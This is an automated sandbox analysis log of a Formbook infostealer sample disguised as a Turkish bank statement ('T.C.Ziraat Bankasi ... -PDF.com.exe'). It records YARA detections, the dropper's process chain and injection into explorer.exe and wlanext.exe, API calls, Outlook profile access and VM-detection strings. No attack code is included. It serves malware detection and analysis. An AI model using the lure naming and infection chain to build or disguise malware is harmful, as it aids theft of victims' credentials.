          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B210D1_2_010B210D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B85141_2_010B8514
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B89491_2_010B8949
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A9DD81_2_010A9DD8
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010AC4181_2_010AC418
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B7CC71_2_010B7CC7
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B80DF1_2_010B80DF
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010B77D31_2_010B77D3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004058032_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004038832_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00401B602_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00421B3F2_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00401C702_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004055E22_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004055E32_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004206D32_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004017C02_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0040BFCE2_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0040BFD32_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0040BF8D2_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004017B32_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B210D2_2_010B210D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B89492_2_010B8949
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B80DF2_2_010B80DF
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B85142_2_010B8514
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A9DD82_2_010A9DD8
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010AC4182_2_010AC418
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B7CC72_2_010B7CC7
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010B77D32_2_010B77D3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: String function: 010A61F0 appears 96 times
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: String function: 010A89B8 appears 56 times
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E5F3 NtCreateFile,2_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E6A3 NtReadFile,2_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E723 NtClose,2_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E7D3 NtAllocateVirtualMemory,2_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E5ED NtCreateFile,2_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E69D NtReadFile,2_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041E7CD NtAllocateVirtualMemory,2_2_0041E7CD
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 35%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 39%
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.iJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exeJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsfD19.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/5
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCommand line argument: Notepad1_2_010A28A0
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCommand line argument: Notepad2_2_010A28A0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A6235 push ecx; ret 1_2_010A6248
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00407033 push ds; retf 2_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041B377 pushad ; iretd 2_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041B379 push eax; iretd 2_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00403444 push ebp; ret 2_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004055DA push ecx; ret 2_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004105E3 push esi; iretd 2_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A6235 push ecx; ret 2_2_010A6248
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeJump to dropped file
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 324Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI coverage: 5.1 %
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI coverage: 2.0 %
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1042 FindFirstFileW,FindClose,1_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1050 FindFirstFileW,FindClose,1_2_010A1050
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1042 FindFirstFileW,FindClose,2_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1050 FindFirstFileW,FindClose,2_2_010A1050
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3476
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI call chain: ExitProcess graph end nodegraph_1-12582
          Source: explorer.exe, 00000003.00000000.267370302.0000000005FA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}nt@she8
          Source: explorer.exe, 00000003.00000002.523892470.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.270321034.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
